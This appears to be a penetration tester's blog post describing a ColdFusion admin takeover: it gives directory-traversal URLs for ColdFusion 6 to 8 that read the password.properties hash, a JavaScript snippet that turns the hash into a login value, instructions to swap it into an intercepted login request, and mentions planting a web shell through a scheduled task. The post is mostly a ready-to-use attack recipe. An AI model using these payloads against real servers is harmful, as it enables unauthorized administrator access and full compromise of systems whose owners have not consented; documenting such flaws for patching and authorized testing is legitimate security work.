So this attack has been published for a while now and I just never posted but I still have found it fruitful during pen tests. For that reason I wanted to collect all the information I have read and learned while performing this attack into one location for my reference.

The basic concept of this attack is a directory traversal to the password.properties which can than be used to login into the server. Once you have admin to Coldfusion you can deploy a cfm web shell through a scheduled task in Coldfusion. Game over of running as administrator. Adobe has released a patch for this attack but I have seen this work on versions 7, 8 and 9 that have not been patched.

Step 1: Directory Traversal

This is the step you will see if its vulnerable or not. Below I listed different strings to traverse. All depends on the version to which one will work. Below are ones I have found to work the best for me. Let me know if you know of any others.

Single server configuration ColdFusion

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

ColdFusion 7

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

ColdFusion 8

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

ColdFusion 6,7 AND 8

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

Step 2: Javascript:hex_hmac_sha1

Once you have the hash from the password.properties you can either drop those in rainbow tables or my following preferred method. Once you copied the hash go back to the login screen and paste the hash into the password field and copy the following javascript and execute.

javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)

This will return another value. The value returned will be used to pass to the login form. This all has to be down pretty fast. Seems to be 30 seconds or less before this value times out. Sometimes cookies will have to be cleared and you will have to rerun the javascript.

So with this value you just have to intercept the login with a proxy and replace the password parameter with this value. If all goes will you should be rewqreded with a nice admin screen. Now do would you like, I like web shells.

References:

http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07